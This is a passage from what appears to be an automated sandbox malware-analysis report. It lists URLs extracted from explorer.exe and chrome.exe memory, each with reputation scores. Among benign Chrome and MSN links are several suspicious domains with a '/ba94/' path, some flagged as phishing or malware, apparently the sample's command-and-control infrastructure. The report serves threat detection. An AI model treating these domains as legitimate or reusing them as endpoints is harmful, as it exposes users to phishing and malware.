                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.hjgd.xyzexplorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://anglebug.com/7308r2chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000002.00000000.1818187033.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6282433377.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3112104349.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        http://anglebug.com/3586nMLchrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://anglebug.com/4633chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://anglebug.com/7382chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://issuetracker.google.com/284462263chrome.exe, 0000000C.00000000.2044986567.00006A1400250000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045485184.00006A14002DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045197719.00006A1400294000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          http://anglebug.com/2970hasechrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.steam.help/ba94/www.galaxyprofituk.comexplorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          http://www.galaxyprofituk.com/ba94/www.yqwija.infoexplorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://anglebug.com/3625jchrome.exe, 0000000C.00000000.2045064861.00006A1400260000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://polymer.github.io/AUTHORS.txtchrome.exe, 0000000F.00000003.2498754185.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2230235506.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2497865910.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.posteo.lol/ba94/explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 0000000F.00000000.2230278633.00005B8000CEC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2223842570.000003C6002C2000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2498436111.00005B8000CEC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            https://anglebug.com/7714chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              https://photos.google.com?referrer=CHROME_NTPchrome.exe, 0000000F.00000003.2498754185.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://anglebug.com/6248chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://anglebug.com/6929chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://wns.windows.com/explorer.exe, 00000002.00000003.3108559713.000000000CB2A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6282322024.000000000CB2A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3106153587.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  http://anglebug.com/5281chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://anglebug.com/2970Pchrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.humidityflash.siteReferer:explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://anglebug.com/5750)chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • 0%, Virustotal, Browse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://chrome.google.com/webstoreBD8781D757D830FC2E85470A1B6E8A718B7EE0D94F25792AF1AA7483936DE29C07chrome.exe, 00000011.00000000.2352547010.00005D4000388000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    https://issuetracker.google.com/255411748chrome.exe, 0000000C.00000000.2045197719.00006A1400294000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://wns.windows.com/Lexplorer.exe, 00000002.00000000.1821307110.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://anglebug.com/7246chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.galaxyprofituk.comReferer:explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://anglebug.com/7369rcentchrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fijula.com/ba94/explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://anglebug.com/7369chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://anglebug.com/7489chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://issuetracker.google.com/220069903enableTranslatedShaderSubstitutionchrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.sol-casino-2023.clubReferer:explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://chrome.google.com/webstorechrome.exe, 00000011.00000000.2352347416.00005D400032C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000002.00000000.1812586501.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://polymer.github.io/PATENTS.txtchrome.exe, 0000000F.00000003.2498754185.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2230235506.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2231564849.00005B800120C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2497865910.00005B8000C5C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://anglebug.com/7279rchrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://issuetracker.google.com/161903006chrome.exe, 0000000C.00000000.2045101881.00006A1400274000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044986567.00006A1400250000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045485184.00006A14002DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.dxtra.shop/ba94/explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://anglebug.com/7724ancedDchrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://www.prismotrov.comexplorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://anglebug.com/3078chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://anglebug.com/7553chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://anglebug.com/5375chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://127.0.0.1:chrome.exe, 00000010.00000000.2292258407.00007B64006FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://anglebug.com/5371chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.creditscorewizards.comReferer:explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://anglebug.com/4722chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.prismotrov.com/ba94/www.reddragondao.comexplorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://anglebug.com/7556chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://chromewebstore.google.com/chrome.exe, 0000000E.00000000.2164729799.000028240025C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2227182415.00005B800025C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000010.00000000.2291060744.00007B640025C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.2351971449.00005D400025C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.creditscorewizards.com/ba94/explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://issuetracker.google.com/253522366ePreperiodchrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://outlook.com_explorer.exe, 00000002.00000000.1821307110.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              low
                                                                              http://anglebug.com/5535ingchrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000002.00000000.1812586501.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://anglebug.com/7036ningchrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://issuetracker.google.com/2000679290chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://anglebug.com/6692chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://issuetracker.google.com/258207403chrome.exe, 0000000C.00000000.2045101881.00006A1400274000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044986567.00006A1400250000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045485184.00006A14002DC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044117522.00006A1400108000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044760096.00006A140020C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.steam.helpReferer:explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://anglebug.com/3502chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://anglebug.com/3623chrome.exe, 0000000C.00000000.2043921425.00006A1400098000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045064861.00006A1400260000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://anglebug.com/3625chrome.exe, 0000000C.00000000.2045064861.00006A1400260000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://www.hjgd.xyz/ba94/explorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000002.00000000.1812586501.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://anglebug.com/3624chrome.exe, 0000000C.00000000.2045064861.00006A1400260000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://www.thesiamesebetta.bizReferer:explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://support.google.com/chrome/?chrome.exe, 0000000F.00000000.2223842570.000003C600302000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://anglebug.com/5007yEchrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://anglebug.com/5007chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://anglebug.com/3862chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000000F.00000000.2228669371.00005B8000869000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.2228722898.00005B8000874000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000010.00000000.2292761880.00007B640086A000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2498912599.00007B640086C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000011.00000000.2352347416.00005D400032C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://anglebug.com/5375armUpchrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.naservus.comexplorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.yourreicapital.com/ba94/www.fijula.comexplorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.yqwija.info/ba94/www.posteo.lolexplorer.exe, 00000002.00000003.3105863084.000000000CB32000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105936315.000000000CB52000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.6281291909.000000000CB5D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3105433261.000000000CB28000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://anglebug.com/4836chrome.exe, 0000000C.00000000.2044841313.00006A1400224000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045161574.00006A1400280000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2043692589.00006A140000C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://issuetracker.google.com/issues/166475273chrome.exe, 0000000C.00000000.2043715753.00006A1400024000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2045352499.00006A14002B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000C.00000000.2044955111.00006A1400240000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
